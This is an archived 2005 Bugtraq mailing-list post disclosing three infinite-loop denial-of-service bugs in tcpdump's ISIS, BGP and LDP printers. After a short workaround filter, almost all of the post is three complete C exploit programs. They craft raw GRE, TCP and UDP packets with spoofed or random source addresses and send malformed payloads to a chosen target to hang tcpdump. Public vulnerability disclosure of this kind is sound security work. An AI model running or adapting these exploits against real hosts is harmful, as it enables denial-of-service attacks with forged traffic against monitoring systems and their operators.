lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050426100057.1748.qmail@www.securityfocus.com>
Date: 26 Apr 2005 10:00:57 -0000
From: Vade 79 <v9@...ehalo.us>
To: bugtraq@...urityfocus.com
Subject: tcpdump[v3.8.x/v3.9.1]: ISIS, BGP, and LDP infinite loop DOS
    exploits.




(everything is now patched in CVS-current, including the ISIS bug)

infinite loop DOS bugs in tcpdump:
 (ISIS) isis_print() infinite loop DOS.
 (BGP) RT_ROUTING_INFO infinite loop DOS.
 (LDP) ldp_print() infinite loop DOS.

the ISIS bug is in 3.8.x/3.9.1/CVS. (did not check below 3.8.x)
the BGP and LDP bugs seem to be only in 3.8.x. (did not check below 3.8.x)

workaround:
 # tcpdump dst port not 179 and dst port not 646 and ip proto not gre
 (NOTE: this does not FULLY work-around the isis_print()
 bug, but it does work-around the provided DOS exploit)

original DOS exploit reference:
 http://fakehalo.us/xtcpdump-isis-dos.c
 http://fakehalo.us/xtcpdump-bgp-dos.c
 http://fakehalo.us/xtcpdump-ldp-dos.c


------------------- exploit: xtcpdump-isis-dos.c -------------------

/*[ tcpdump[3.8.x/3.9.1]: (ISIS) isis_print() infinite loop DOS. ]* 
 *                                                                *
 * by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-isis-dos.c -o xtcpdump-isis-dos                  *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.9.1 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (GRE) packet  *
 * causing an infinite loop.  the packet doesnt actually have to  *
 * be an GRE packet, as the function is used in isoclns_print()   *
 * which is used many places by tcpdump, however i went with GRE  *
 * because it was the first one that popped up.                   *
 *                                                                *
 * as this bug doesn't appear to be fixed in the new(3.9.x/CVS)   *
 * versions i'll elaborate on the problem.  the bug lies in       *
 * isis_print()(called by isoclns_print()) in the                 *
 * TLV_ISNEIGH_VARLEN portion of the code, be providing a zero    *
 * length causing an infinite loop.                               *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen,        *
 * however most need the "-v" argument.                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

#define DFL_AMOUNT 5

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct greh{
#ifdef _USE_BIG_ENDIAN
  u_int8_t  check:1,routing:1,key:1,seq:1,strict:1,recur:3;
  u_int8_t  flags:5,version:3;
#else
  u_int8_t  recur:3,strict:1,seq:1,key:1,routing:1,check:1;
  u_int8_t  version:3,flags:5;
#endif
  u_int16_t protocol;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed ISIS data. (the bug) */
static char payload[]=
 "\x83\x1b\x01\x06\x12\x01\xff\x07\xff\xff"
 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\xff\xff\xff\x01\x07\x00\x00";

/* prototypes. (and sig_alarm) */
void gre_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x/3.9.1]: (ISIS) isis_print() infinite loop "
 "DOS.\n[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2)saddr=getip(argv[2]);
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  gre_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
/* (spoofed) generates and sends a (GRE) ip packet. */
void gre_spoof(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct greh gre;
 struct sumh sum;
 /* create raw (GRE) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_GRE))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct greh)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&gre,0,sizeof(struct greh));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_GRE;
 ip.frag_off=64;
 /* OSI. (to isoclns_print(), then to isis_print()) */
 gre.protocol=htons(254);
 /* needed for the ip checksum. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct greh)+sizeof(payload)-1);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&gre,sizeof(struct greh));
 memcpy(p+(sizeof(struct iph)+sizeof(struct greh)),
 payload,sizeof(payload));
 /* send the malformed (GRE) packet. (ISIS data) */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<psize)
  printe("failed to send forged GRE packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}


------------------- exploit: xtcpdump-bgp-dos.c -------------------

/*[ tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS. ]***** 
 *                                                                *
 * by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos                    *
 *  gcc xtcpdump-bgp-dos.c -o xtcpdump-bgp-dos -D_USE_SYN         *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (BGP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * BGP is TCP, however the victim does not have to have the BGP   *
 * port(179) open to abuse the bug.  by sending a specially       *
 * crafted (spoofed) TCP(ACK,PUSH) packet to port 179 you can     *
 * trigger the infinite loop, however it depends on if the packet *
 * can make it out without being dropped.  in some situations the *
 * source host/ip used must be within your local subnet(or your   *
 * actual ip) for the (spoofed) packet to make it past your own   *
 * router.  if for some reason you think a (invalid) TCP(SYN)     *
 * packet is more likely to make it out, compile with the         *
 * -D_USE_SYN flag. (tcpdump will parse the BGP data even if it   *
 * is a TCP(SYN) packet)                                          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen.        *
 * however most need the "-v" argument, and a some need the       *
 * "-s" (snaplen) set to 88(non-spoofed is around 100, with the   *
 * ip options) or more.                                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define BGP_PORT 179
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct tcph{
 unsigned short source;
 unsigned short dest;
 unsigned int seq;
 unsigned int ack_seq;
#ifdef _USE_BIG_ENDIAN
 unsigned short doff:4,res1:4,cwr:1,ece:1,
 urg:1,ack:1,psh:1,rst:1,syn:1,fin:1;
#else
 unsigned short res1:4,doff:4,fin:1,syn:1,
 rst:1,psh:1,ack:1,urg:1,ece:1,cwr:1;
#endif
 unsigned short window;
 unsigned short check;
 unsigned short urg_ptr;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed BGP data. (the bug) */
static char payload[]=
 /* shortened method. (34 bytes) */
 "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00"
 "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01"
 "\x84\x00\x00\x00";
 /* original method, un-comment/swap if desired. (39 bytes) */
 /* "\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" */
 /* "\xff\xff\xff\xff\xff\xff\x00\x13\x02\x00" */
 /* "\x01\x00\xff\x00\xff\x0e\x00\xff\x00\x01" */
 /* "\x84\x00\x00\x20\x00\x00\x00\x00\x00"; */

/* prototypes. (and sig_alarm) */
void bgp_connect(unsigned int);
void bgp_inject(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop "
 "DOS.\n[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(nospoof){
  printf("[*] target: %s\n",argv[1]);
  bgp_connect(daddr);
  printf("[*] done.\n");
 }
 else{
  if(!amt)printe("no packets?",1);
  printf("[*] destination\t: %s\n",argv[1]);
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
  printf("[*] amount\t: %u\n\n",amt);
  printf("[+] sending(packet = .): ");
  fflush(stdout);
  while(amt--){
   /* spice things up. */
   srandom(time(0)+amt);
   bgp_inject(daddr,saddr);
   printf(".");
   fflush(stdout);
   usleep(50000);
  }
  printf("\n\n[*] done.\n");
 }
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) generic connection. (port 179 on the */
/* victim has to be open for this to work) */
void bgp_connect(unsigned int daddr){
 signed int sock;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(BGP_PORT);
 s.sin_addr.s_addr=daddr;
 printf("[*] attempting to connect...\n");
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("(non-spoofed) BGP connection failed.",1);
 alarm(0);
 printf("[*] successfully connected.\n");
 printf("[*] sending malformed BGP data. (%u bytes)\n",
 sizeof(payload)-1);
 usleep(500000);
 write(sock,payload,sizeof(payload));
 usleep(500000);
 printf("[*] closing connection.\n\n");
 close(sock);
 return;
}
/* (spoofed) generates and sends an unestablished (BGP) */
/* TCP(ACK,PUSH) or TCP(SYN) packet. */
void bgp_inject(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct tcph tcp;
 struct sumh sum;
 /* create raw (TCP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_TCP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(BGP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct tcph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&tcp,0,sizeof(struct tcph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.id=(random()%65535);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_TCP;
 ip.frag_off=64;
 tcp.seq=(random()%0xffffffff+1);
 tcp.source=htons(random()%60000+1025);
 tcp.dest=sa.sin_port;
 /* passing BGP data as ip options for the syn packet method */
 /* doesn't work as tcpdump doesnt process it as BGP data. */
 tcp.doff=5;
#ifdef _USE_SYN
 tcp.syn=1;
 tcp.window=htons(65535);
#else
 tcp.ack=1;
 tcp.psh=1;
 tcp.ack_seq=(random()%0xffffffff+1);
 tcp.window=htons(4096*(random()%2+1));
#endif
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct tcph)+sizeof(payload)-1);
 /* make sum/calc buffer for the tcp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct tcph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&tcp,sizeof(struct tcph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct tcph),
 payload,sizeof(payload)-1);
 tcp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct tcph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&tcp,sizeof(struct tcph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct tcph)),
 payload,sizeof(payload));
 /* send the malformed BGP packet. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<psize)
  printe("failed to send forged BGP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}


------------------- exploit: xtcpdump-ldp-dos.c -------------------

/*[ tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS. ]********* 
 *                                                                *
 * by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)               *
 *                                                                *
 * compile:                                                       *
 *  gcc xtcpdump-ldp-dos.c -o xtcpdump-ldp-dos                    *
 *                                                                *
 * tcpdump homepage/URL:                                          *
 *  http://www.tcpdump.org                                        *
 *                                                                *
 * fix:                                                           *
 *  this appears to have been fixed in the alpha 3.9.x / CVS      *
 *  versions.  although i found no direct mention of the issue    *
 *  itself being resolved, the code has been changed in a way to  *
 *  not allow this to happen.                                     *
 *                                                                *
 * Tcpdump is a program that allows you to dump the traffic on a  *
 * network. It can be used to print out the headers of packets on *
 * a network interface that matches a given expression. You can   *
 * use this tool to track down network problems, to detect "ping  *
 * attacks" or to monitor the network activities.                 *
 *                                                                *
 * tcpdump(v3.8.3 and earlier versions) contains a remote denial  *
 * of service vulnerability in the form of a single (LDP) packet  *
 * causing an infinite loop.                                      *
 *                                                                *
 * LDP is UDP(/TCP), so no LDP service has to actually be running *
 * to abuse this issue, spoofed or not spoofed.  depending on the *
 * path the packet takes spoofed packets may be dropped(dropped   *
 * at your router most likely), in such a case non-spoofed        *
 * packets have the same effect, they just show your ip.          *
 *                                                                *
 * some versions of tcpdump(depending on the platform/OS) need no *
 * special command-line arguments to allow this to happen,        *
 * however most need the "-v" argument.                           *
 ******************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#ifdef _USE_ARPA
#include <arpa/inet.h>
#endif

/* doesn't seem to be standardized, so... */
#if defined(__BYTE_ORDER) && !defined(BYTE_ORDER)
#define BYTE_ORDER __BYTE_ORDER
#endif
#if defined(__BIG_ENDIAN) && !defined(BIG_ENDIAN)
#define BIG_ENDIAN __BIG_ENDIAN
#endif
#if defined(BYTE_ORDER) && defined(BIG_ENDIAN)
#if BYTE_ORDER == BIG_ENDIAN
#define _USE_BIG_ENDIAN
#endif
#endif

/* will never need to be changed. */
#define LDP_PORT 646
#define DFL_AMOUNT 5
#define TIMEOUT 10

/* avoid platform-specific header madness. */
/* (just plucked out of header files) */
struct iph{
#ifdef _USE_BIG_ENDIAN
 unsigned char version:4,ihl:4;
#else
 unsigned char ihl:4,version:4;
#endif
 unsigned char tos;
 unsigned short tot_len;
 unsigned short id;
 unsigned short frag_off;
 unsigned char ttl;
 unsigned char protocol;
 unsigned short check;
 unsigned int saddr;
 unsigned int daddr;
};
struct udph{
  unsigned short source;
  unsigned short dest;
  unsigned short len;
  unsigned short check;
};
struct sumh{
  unsigned int saddr;
  unsigned int daddr;
  unsigned char fill;
  unsigned char protocol;
  unsigned short len;
};

/* malformed LDP data. (the bug) */
static char payload[]=
 "\x00\x01\xff\xff\xff\xff\xff\xff\xff"
 "\xff\xff\xff\x00\x00\xff\xff\xff\xff";

/* prototypes. (and sig_alarm) */
void ldp_nospoof(unsigned int);
void ldp_spoof(unsigned int,unsigned int);
unsigned short in_cksum(unsigned short *,signed int);
unsigned int getip(char *);
void printe(char *,signed char);
void sig_alarm(){printe("alarm/timeout hit.",1);}

/* begin. */
int main(int argc,char **argv) {
 unsigned char nospoof=0;
 unsigned int amt=DFL_AMOUNT;
 unsigned int daddr=0,saddr=0;
 printf("[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS."
 "\n[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)\n\n");
 if(argc<2){
  printf("[*] syntax: %s <dst host> [src host(0=random)] [amount]\n",
  argv[0]);
  printf("[*] syntax: %s <dst host> nospoof\n",argv[0]);
  exit(1);
 }
 if(!(daddr=getip(argv[1])))
  printe("invalid destination host/ip.",1);
 if(argc>2){
  if(strstr(argv[2],"nospoof"))nospoof=1;
  else saddr=getip(argv[2]);
 }
 if(argc>3)amt=atoi(argv[3]);
 if(!amt)printe("no packets?",1);
 printf("[*] destination\t: %s\n",argv[1]);
 if(!nospoof)
  printf("[*] source\t: %s\n",(saddr?argv[2]:"<random>"));
 printf("[*] amount\t: %u\n\n",amt);
 printf("[+] sending(packet = .): ");
 fflush(stdout);
 while(amt--){
  /* spice things up. */
  srandom(time(0)+amt);
  if(nospoof)ldp_nospoof(daddr);
  else ldp_spoof(daddr,saddr);
  printf(".");
  fflush(stdout);
  usleep(50000);
 }
 printf("\n\n[*] done.\n");
 fflush(stdout);
 exit(0);
}
/* (non-spoofed) sends a (LDP) udp packet. */
void ldp_nospoof(unsigned int daddr){
 signed int sock;
 struct sockaddr_in sa;
 sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 if(sendto(sock,payload,sizeof(payload)-1,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<sizeof(payload)-1)
  printe("failed to send non-spoofed LDP packet.",1);
 close(sock);
 return;
}
/* (spoofed) generates and sends a (LDP) udp packet. */
void ldp_spoof(unsigned int daddr,unsigned int saddr){
 signed int sock=0,on=1;
 unsigned int psize=0;
 char *p,*s;
 struct sockaddr_in sa;
 struct iph ip;
 struct udph udp;
 struct sumh sum;
 /* create raw (UDP) socket. */
 if((sock=socket(AF_INET,SOCK_RAW,IPPROTO_UDP))<0)
  printe("could not allocate raw socket.",1);
 /* allow (on some systems) for the user-supplied ip header. */
#ifdef IP_HDRINCL
 if(setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)))
  printe("could not set IP_HDRINCL socket option.",1);
#endif
 sa.sin_family=AF_INET;
 sa.sin_port=htons(LDP_PORT);
 sa.sin_addr.s_addr=daddr;
 psize=(sizeof(struct iph)+sizeof(struct udph)+sizeof(payload)-1);
 memset(&ip,0,sizeof(struct iph));
 memset(&udp,0,sizeof(struct udph));
 /* values not filled = 0, from the memset() above. */
 ip.ihl=5;
 ip.version=4;
 ip.tot_len=htons(psize);
 ip.saddr=(saddr?saddr:random()%0xffffffff);
 ip.daddr=daddr;
 ip.ttl=(64*(random()%2+1));
 ip.protocol=IPPROTO_UDP;
 ip.frag_off=64;
 udp.source=htons(random()%60000+1025);
 udp.dest=htons(LDP_PORT);
 udp.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* needed for (correct) checksums. */
 sum.saddr=ip.saddr;
 sum.daddr=ip.daddr;
 sum.fill=0;
 sum.protocol=ip.protocol;
 sum.len=htons(sizeof(struct udph)+sizeof(payload)-1);
 /* make sum/calc buffer for the udp checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct sumh)+sizeof(struct udph)
 +sizeof(payload)+1));
 memcpy(s,&sum,sizeof(struct sumh));
 memcpy(s+sizeof(struct sumh),&udp,sizeof(struct udph));
 memcpy(s+sizeof(struct sumh)+sizeof(struct udph),
 payload,sizeof(payload)-1);
 udp.check=in_cksum((unsigned short *)s,
 sizeof(struct sumh)+sizeof(struct udph)+sizeof(payload)-1);
 free(s);
 /* make sum/calc buffer for the ip checksum. (correct) */
 if(!(s=(char *)malloc(sizeof(struct iph)+1)))
  printe("malloc() failed.",1);
 memset(s,0,(sizeof(struct iph)+1));
 memcpy(s,&ip,sizeof(struct iph));
 ip.check=in_cksum((unsigned short *)s,sizeof(struct iph));
 free(s);
 /* put the packet together. */
 if(!(p=(char *)malloc(psize+1)))
  printe("malloc() failed.",1);
 memset(p,0,psize);
 memcpy(p,&ip,sizeof(struct iph));
 memcpy(p+sizeof(struct iph),&udp,sizeof(struct udph));
 memcpy(p+(sizeof(struct iph)+sizeof(struct udph)),
 payload,sizeof(payload));
 /* send the malformed LDP packet. */
 if(sendto(sock,p,psize,0,(struct sockaddr *)&sa,
 sizeof(struct sockaddr))<psize)
  printe("failed to send forged LDP packet.",1);
 free(p);
 return;
}
/* standard method for creating TCP/IP checksums. */
unsigned short in_cksum(unsigned short *addr,signed int len){
 unsigned short answer=0;
 register unsigned short *w=addr;
 register int nleft=len,sum=0;
 while(nleft>1){
  sum+=*w++;
  nleft-=2;
 }
 if(nleft==1){
  *(unsigned char *)(&answer)=*(unsigned char *)w;
  sum+=answer;
 }
 sum=(sum>>16)+(sum&0xffff);
 sum+=(sum>>16);
 answer=~sum;
 return(answer);
}
/* gets the ip from a host/ip/numeric. */
unsigned int getip(char *host){
 struct hostent *t;
 unsigned int s=0;
 if((s=inet_addr(host))){
  if((t=gethostbyname(host)))
   memcpy((char *)&s,(char *)t->h_addr,sizeof(s));
 }
 if(s==-1)s=0;
 return(s);
}
/* all-purpose error/exit function. */
void printe(char *err,signed char e){
 printf("[!] %s\n",err);
 if(e)exit(e);
 return;
}


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ